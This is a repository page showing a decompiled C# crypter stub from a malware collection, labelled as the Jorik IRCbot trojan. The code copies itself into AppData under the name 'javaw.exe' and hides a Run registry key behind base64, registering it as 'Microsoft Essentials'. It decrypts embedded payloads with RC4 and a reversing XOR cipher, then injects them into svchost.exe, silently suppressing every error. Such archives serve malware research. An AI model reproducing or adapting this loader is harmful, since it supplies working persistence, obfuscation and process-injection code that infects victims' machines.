ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-21 02:46:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
8f49a583f2
MalwareSourceCode/MSIL/Trojan/Win32/J/Trojan.Win32.Jorik.IRCbot.anj-296f7eecb994ab8b677ff5c7ad9abb7039c800cf5860ac2945e044e236dabf27/Program.cs

96 lines
3.4 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: CrypterSource.Program
// Assembly: AryanF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2EB8EB51-C97D-4251-9393-007DD226E453
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Jorik.IRCbot.anj-296f7eecb994ab8b677ff5c7ad9abb7039c800cf5860ac2945e044e236dabf27.exe
using Microsoft.Win32;
using System;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Text;
namespace CrypterSource
{
internal class Program
{
private static void Main()
{
try
{
File.Copy(Assembly.GetExecutingAssembly().Location, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\javaw.exe");
Registry.CurrentUser.OpenSubKey(Encoding.ASCII.GetString(Convert.FromBase64String("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu")), true).SetValue("Microsoft Essentials", (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\javaw.exe"), RegistryValueKind.String);
ResourceManager resourceManager = new ResourceManager("files", Assembly.GetExecutingAssembly());
byte[] numArray = Program.PolyRevDecrypt((byte[]) resourceManager.GetObject("_CLRb98hOPqbyekD5To7d"), "_uxiONH6s");
Type type = Assembly.Load(Program.RC4((byte[]) resourceManager.GetObject("lolumad"), "_FmEb1ONweckrT3iv")).GetTypes()[0];
type.GetMethod("Run").Invoke(Activator.CreateInstance(type), new object[2]
{
(object) numArray,
(object) "svchost.exe"
});
}
catch
{
}
}
public static byte[] RC4(byte[] bytes, string Key)
{
byte[] bytes1 = Encoding.ASCII.GetBytes(Key);
byte[] numArray1 = new byte[256];
byte[] numArray2 = new byte[256];
for (int index = 0; index < 256; ++index)
{
numArray1[index] = (byte) index;
numArray2[index] = bytes1[index % bytes1.GetLength(0)];
}
int index1 = 0;
for (int index2 = 0; index2 < 256; ++index2)
{
index1 = (index1 + (int) numArray1[index2] + (int) numArray2[index2]) % 256;
byte num = numArray1[index2];
numArray1[index2] = numArray1[index1];
numArray1[index1] = num;
}
int index3;
int index4 = index3 = 0;
for (int index5 = 0; index5 < bytes.GetLength(0); ++index5)
{
index4 = (index4 + 1) % 256;
index3 = (index3 + (int) numArray1[index4]) % 256;
byte num = numArray1[index4];
numArray1[index4] = numArray1[index3];
numArray1[index3] = num;
int index6 = ((int) numArray1[index4] + (int) numArray1[index3]) % 256;
bytes[index5] ^= numArray1[index6];
}
return bytes;
}
public static byte[] PolyRevDecrypt(byte[] data, string pass)
{
Array.Reverse((Array) data);
byte num = data[data.Length - 1];
byte[] bytes = Encoding.ASCII.GetBytes(pass);
byte[] array = new byte[data.Length + 1];
int index1 = 0;
for (int index2 = 0; index2 <= data.Length - 1; ++index2)
{
array[index2] = (byte) ((uint) data[index2] ^ (uint) num ^ (uint) bytes[index1]);
Array.Reverse((Array) bytes);
if (index1 == bytes.Length - 1)
index1 = 0;
else
++index1;
}
Array.Resize<byte>(ref array, array.Length - 2);
return array;
}
private static void OHNADWHOWADHohdwAOHD()
{
}
}
}
Reference in New Issue Copy Permalink